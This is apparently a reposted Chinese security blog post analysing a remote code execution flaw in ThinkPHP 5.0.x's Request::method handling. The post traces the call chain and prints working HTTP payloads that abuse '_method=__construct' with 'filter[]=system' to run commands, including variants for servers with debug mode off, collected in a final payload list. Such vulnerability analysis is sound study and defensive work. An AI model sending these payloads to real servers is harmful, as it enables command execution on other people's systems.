文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

ThinkPHP5 Request类method任意方法调用RCE

2023-09-06 17:51

关注

ThinkPHP v5.0.x

环境

method任意调用方法导致rce

开启debug选项

POST_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami

处理请求到路由检测部分的时候会调用\think\Request::method函数

image-20230121235958524

该函数用于获取当前请求类型,config文件默认为_method

image-20230121233046232

在获取method之后便会通过动态调用去调用method值同名类方法,即__construct传递的值为post数组。

__construct函数中对 o p t i o n 的键名同名的类属性赋值为 option的键名同名的类属性赋值为 option的键名同名的类属性赋值为options中该键的对应值。按照payload中的内容即是对filter和server属性进行替换。

image-20230121234122458

最后\think\Request::param去调用method获取原始请求类型时进入\think\Request::server函数这时的$this->server已经被覆盖为whoami

image-20230121235227286

image-20230121235533885

最终传入\think\Request::filterValuecall_user_func进行方法调用。

image-20230121234949557

image-20230121235012148

\think\App::run中的位置如下

image-20230121235821226

此时的触发点位于记录路由和请求信息的部分,这也是为什么需要开启debug选项。

0.13版本之前无需开启debug就能rce,之前的版本中下图代码不会在think\App::exec() -> think\App::module() 中重新再设置一次默认filter,这就会覆盖传入的恶意filter类属性。

image-20230122001258419

之前的版本仅在路由调度之前进行设置filter,think\App::module()中不再进行设置。

image-20230122002506025

而debug记录的位置位于think\App::exec()上方,自然不会受到影响。

关闭debug选项(默认)

从上面可以看到,filter变量清除在module分支中完成的,通过进入其他进行绕过分支。

#无回显POST ?s=captcha/calc_method=__construct&filter[]=system&method=GET#有回显,传参方式差异    POST ?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoamior_method=__construct&method=get&filter[]=system&get[]=whoami

image-20230122003720809

此时的调用链如下,由array_walk_recursive调用filterValue函数,完成命令执行。

image-20230122003853856

image-20230122003919961

payload

#debug相关POST ?s=index/indexs=whoami&_method=__construct&method=POST&filter[]=system    aaaa=whoami&_method=__construct&method=GET&filter[]=system    _method=__construct&method=GET&filter[]=system&get[]=whoami    _method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami    _method=__construct&method=GET&filter[]=system&get[]=whoamic=system&f=calc&_method=filter    #需进入非module路由#无回显POST ?s=captcha/calc_method=__construct&filter[]=system&method=GET#有回显,传参方式差异    POST ?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami_method=__construct&method=get&filter[]=system&get[]=whoami

参考

https://y4er.com/posts/thinkphp5-rce/

https://www.sec-in.com/article/1863

https://xz.aliyun.com/t/7792
.com/article/1863](https://www.sec-in.com/article/1863)

https://xz.aliyun.com/t/7792

来源地址:https://blog.csdn.net/weixin_43610673/article/details/128757142

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯